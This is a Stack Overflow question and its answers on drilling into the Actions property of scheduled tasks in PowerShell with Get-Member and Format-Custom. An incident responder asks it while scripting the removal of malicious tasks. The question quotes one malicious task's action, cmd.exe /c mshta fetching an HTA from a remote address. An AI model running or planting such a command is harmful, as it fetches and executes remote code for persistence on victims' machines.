# Drill-down further in Get-Member within PowerShell

Tags: powershell

I'm trying hard to learn PowerShell on my own and I'm asking this question after searching a lot on the Internet.

```
Get-ScheduledTask  |  Get-Member
```

The above command shows me the Properties and Methods. Now I want to further drill down into "Actions" but the maximum I'm able to is,

```
Get-ScheduledTask  |  Get-Member -Name Actions 
Name    MemberType Definition                                  
----    ---------- ----------                                  
Actions Property   CimInstance#InstanceArray Actions {get;set;}
```

Ideally, if I want to peek into "Actions" I have to do this,

```
Get-ScheduledTask -TaskName "WindowsShellUpdate" | Select -ExpandProperty Actions
Id               : 
Arguments        : /c mshta http://xx.xx.xx.xx/win/update.hta
Execute          : C:\Windows\System32\cmd.exe
WorkingDirectory : 
PSComputerName   :
```

Side note, I do IR. And I'm building a script to very carefully automate the removal of bad Tasks.

:(

Comment: Is this what you want? `(Get-ScheduledTask).Actions | Get-Member`

Answer (score 0, accepted):

- **[`Get-Member`](https://learn.microsoft.com/powershell/module/microsoft.powershell.utility/get-member)** performs *reflection*: its **reports information about .NET *types* (classes) and their *members*** (properties, methods, events, delegates) in the abstract.

  - This means that property *values* of the given *instance* of a type in the input are *not* included.
- Also, **`Get-Member` is *not recursive***: it only lists the member definitions of the type itself, not also the members' members.

As such, if the intent was to see the members of the types of the *elements* of the collection of type `CimInstance#InstanceArray` contained in the `.Actions` property, use the command suggested by [zett42](https://stackoverflow.com/users/7571258/zett42):

```sh
# Get information about the type [of the elements] stored in the .Actions property.
(Get-ScheduledTask).Actions | Get-Member
```

Note:

- Since sending a *collection* (array) through the pipeline *enumerates* it - i.e. sends its *elements*, *one by one*, providing a collection to `Get-Member` *via the pipeline* returns information about the distinct types of that collection's *elements*.
- To inspect a collection type *itself*, you must pass it to the `InputObject` parameter:

  ```sh
  # Get information about the *collection type* stored in the .Actions property.
  Get-Member -InputObject (Get-ScheduledTask).Actions
  ```

---

However, **there *is* an - informal<sup>[1]</sup>  - way to get a *recursive* representation of the structure of any given object instance, which even includes property *values***, namely via the **[`Format-Custom`](https://learn.microsoft.com/powershell/module/microsoft.powershell.utility/format-custom)** cmdlet:

```sh
# See sample output below
Get-ScheduledTask | Select-Object -First 1 | Format-Custom
```

Note:

- The recursion *depth* is limited to `5` by default, but you can increase or decrease it via the `-Depth` parameter.

  - As you can see below, the output from a deeply nested object can be lengthy.
- *Collection* property values are enumerated up to *4* elements by default, but you can change that via [the `$FormatEnumerationLimit` preference variable](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_Preference_Variables#formatenumerationlimit) - see [this answer](https://stackoverflow.com/a/68805903/45375) for details.

Output of the above command (excerpt):

```
class CimInstance#Root/Microsoft/Windows/TaskScheduler/MSFT_ScheduledTask
{
  Actions = 
    [
      class CimInstance#Root/Microsoft/Windows/TaskScheduler/MSFT_TaskExecAction
      {
        Id = 
        Arguments = --scheduledautoupdate $(Arg0)
        Execute = C:\Users\jdoe\AppData\Local\Programs\Opera\launcher.exe
        WorkingDirectory = 
        PSComputerName = 
      }
    ]
    
  Author = MKW10\jdoe
  Date = 
  Description = Keeps Opera up to date.
  Documentation = 
  Principal = 
    class CimInstance#Root/Microsoft/Windows/TaskScheduler/MSFT_TaskPrincipal2
    {
      DisplayName = 
      GroupId = 
      Id = Author
      LogonType = Interactive
      RunLevel = Highest
      UserId = jdoe
      ProcessTokenSidType = Default
      RequiredPrivilege = 
      PSComputerName = 
    }
...
```

---

<sup>[1] As with all `Format-*` cmdlets, `Format-Custom` outputs a rich *string* representation for the *human observer*, not for *programmatic processing*.</sup>

Answer (score 0):

`Actions` is just a collection of another object extracted from `WMI` (`CimInstance`). When you define a `Scheduled Task` with PowerShell, you can in order:

- Define a Principal: `New-ScheduledTaskPrincipal`
- Define Task settings: `New-ScheduledTaskSettingsSet`
- Define some Triggers: `New-ScheduledTaskTrigger`
- Define some Actions: `New-ScheduledTaskAction`

Then create a task with these parameters:

- `New-ScheduledTask`

And finally register the task:

- `Register-ScheduledTask`

There are some advanced properties that may be accessible, by example on triggers of a task that can only be set once the task is created.
`(Get-ScheduledTask)[0].Triggers[0].Repetition.Duration` and then once defined you update the task with `Set-ScheduledTask`

All these cmdlets just hide the complexity of `WMI` class instances.

Comment: Thank you Hazrelle, zett42 and mklement0 I really appreciate you taking time out of your schedule to help. :) (Get-ScheduledTask).Actions | Get-Member was it but the other explanation helped me understand what was up. So Get-Member is like "just give me one object to drill down ok, don't complicate things" haha Thank you once again!